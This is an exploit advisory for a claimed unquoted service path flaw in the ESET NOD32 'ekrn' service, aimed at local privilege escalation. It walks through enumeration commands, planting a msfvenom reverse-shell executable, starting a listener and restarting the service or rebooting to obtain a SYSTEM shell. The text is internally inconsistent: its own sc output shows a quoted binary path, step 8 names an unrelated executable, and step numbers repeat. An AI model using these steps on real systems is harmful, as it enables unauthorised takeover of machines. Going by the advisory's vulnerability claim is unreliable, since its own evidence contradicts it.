ESET NOD32 Antivirus 18.0.12.0 Unquoted Service Path

`# Exploit Title: ESET NOD32 Antivirus 18.0.12.0 - "ESET Service" Unquoted  
Service Path  
# Exploit Author: Milad Karimi (Ex3ptionaL)  
# Exploit Date: 2024-11-02  
# Contact: [email protected]  
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL  
# MiRROR-H: https://mirror-h.org/search/hacker/49626/  
# Vendor : https://www.eset.com  
# Version : 18.0.12.0  
# Tested on OS: Microsoft Windows 10 pro x64  
  
About Unquoted Service Path :  
==============================  
  
When a service is created whose executable path contains spaces and isn't  
enclosed within quotes, leads to a vulnerability known as Unquoted Service  
Path which allows a user to gain SYSTEM privileges.  
(only if the vulnerable service is running with SYSTEM privilege level  
which most of the time it is).  
  
Description:  
==============================  
ESET NOD32 Antivirus installs a service with an unquoted service path.  
To properly exploit this vulnerability, the local attacker must insert an  
executable file in the path of the service.  
Upon service restart or system reboot, the malicious code will be run with  
elevated privileges.  
  
# PoC  
===========  
  
1. Open CMD and check for the vulnerability by typing [ wmic service get  
name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v  
"c:\windows\\" | findstr /i /v """ ]  
2. The vulnerable service would show up.  
3. Check the service permissions by typing [ sc qc "ekrn" ]  
4. The command would return..  
  
C:\Users\Ci3c0>sc qc ekrn  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: ekrn  
TYPE : 20 WIN32_SHARE_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"  
LOAD_ORDER_GROUP : Base  
TAG : 0  
DISPLAY_NAME : ESET Service  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
5. This concludes that the service is running as SYSTEM.  
6. Now create a payload with msfvenom or other tools and name it to  
ekrn.exe.  
7. Make sure you have write permissions to "C:\Program Files\ESET\ESET  
Security" directory.  
8. Provided that you have right permissions, drop the HDDHealthService.exe  
executable you created into the "C:\Program Files\ESET\ESET Security"  
directory.  
9. Start a listener.  
9. Now restart the ekrn service by giving coommand [ sc stop ekrn ]  
followed by [ sc start ekrn ]  
9.1 If you cannot stop and start the service, since the service is of type  
"AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ]  
and get the shell when the service starts automatically.  
10. Got shell.  
  
During my testing :  
  
Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o ekrn.exe  
  
  
# Disclaimer  
=============  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
The author is not responsible for any misuse of the information contained  
herein and accepts no responsibility for any damage caused by the use or  
misuse of this information.  
The author prohibits any malicious use of security related information or  
exploits by the author or elsewhere.  
`